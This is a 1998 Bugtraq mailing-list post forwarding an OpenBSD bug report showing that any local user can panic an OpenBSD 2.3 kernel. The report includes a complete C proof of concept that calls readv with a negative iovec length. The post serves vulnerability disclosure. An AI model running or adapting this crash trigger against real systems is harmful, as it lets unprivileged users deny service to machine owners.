Bugtraq mailing list archives

Fwd: Any user can panic OpenBSD machine

From: mfuhr () DIMENSIONAL COM (Michael Fuhr)
Date: Mon, 27 Jul 1998 11:23:59 -0600


-----Forwarded message from jon () oaktree co uk-----

Message-Id: <199807271126.MAA16724 () chalk oaktree net uk>
Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
From: jon () oaktree co uk
To: gnats () openbsd org
X-Send-Pr-Version: 3.97
Subject: kernel/549: Any user can panic OpenBSD machine
Sender: owner-bugs () openbsd org

Number:         549
Category:       kernel
Synopsis:       readv with -ve block size panics kernel
Confidential:   yes
Severity:       critical
Priority:       high
Responsible:    bugs
State:          open
Class:          sw-bug
Submitter-Id:   net
Arrival-Date:   Mon Jul 27 05:40:02 MDT 1998
Last-Modified:
Originator:     Jon Ribbens
Organization:

\/ Jon Ribbens / jon () oaktree co uk

Release:        2.3
Environment:


        System      : OpenBSD 2.3
        Architecture: OpenBSD.i386
        Machine     : i386

Description:

        readv with one of the blocks having a -ve size panics the kernel.
        Oops.

How-To-Repeat:


#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

int main(void) {
  struct iovec iov[1];
  char buffer[1024];

  iov[0].iov_base = buffer;
  iov[0].iov_len = -1;

  return readv(0, iov, 1);
}

        run the above program, type a few characters, press return, observe
        either kernel panic or machine hang. panic message is
        "panic: ureadc: non-positive resid". Any user can do this.

Fix:

        Dunno I'm afraid.

Audit-Trail:
Unformatted:


-----End of forwarded message-----

--
Michael Fuhr
http://www.fuhr.net/~mfuhr/

Current thread:

Re: Another NEW mIRC bug and ALL mIRC Exploit patches, (continued)
- - Re: Another NEW mIRC bug and ALL mIRC Exploit patches Mike Zimmerman (Jul 25)
- small bug in 5/98 distribution Sun 4070627 Lloyd Vancil (Jul 24)
  - Re: small bug in 5/98 distribution Sun 4070627 Eugene Bradley (Jul 24)
    - Re: small bug in 5/98 distribution Sun 4070627 Brandon Hume (Jul 26)
    - Re: small bug in 5/98 distribution Sun 4070627 Casper Dik (Jul 27)
    - FW: Alert: Arbitrary code execution via email or news Patrick Oonk (Jul 27)
    - ISS Security Advisory -- MS Exchange 5.x Jon Larimer (Jul 27)
    - [ NT SECURITY ALERT ] New Local GetAdmin Exploit MJE (Jul 27)
    - Microsoft Security Bulletin (MS98-009) Aleph One (Jul 28)
    - Microsoft Security Bulletin (MS98-008) Aleph One (Jul 27)
    - Fwd: Any user can panic OpenBSD machine Michael Fuhr (Jul 27)
    - Re: Fwd: Any user can panic OpenBSD machine David Maxwell (Jul 27)
    - Re: Fwd: Any user can panic OpenBSD machine Dag-Erling Coidan Smørgrav (Jul 27)
    - Re: Fwd: Any user can panic OpenBSD machine Michael Fuhr (Jul 27)
    - Re: Fwd: Any user can panic OpenBSD machine Angelos D. Keromytis (Jul 27)
    - Re: Fwd: Any user can panic OpenBSD machine Perry E. Metzger (Jul 27)
    - Re: Fwd: Any user can panic OpenBSD machine Theo de Raadt (Jul 28)
    - Re: Fwd: Any user can panic OpenBSD machine Perry E. Metzger (Jul 28)
    - Re: Fwd: Any user can panic OpenBSD machine Theo de Raadt (Jul 28)
    - Re: Fwd: Any user can panic OpenBSD machine Perry E. Metzger (Jul 28)
    - Re: Fwd: Any user can panic OpenBSD machine Alfred Huger (Jul 28)

(Thread continues...)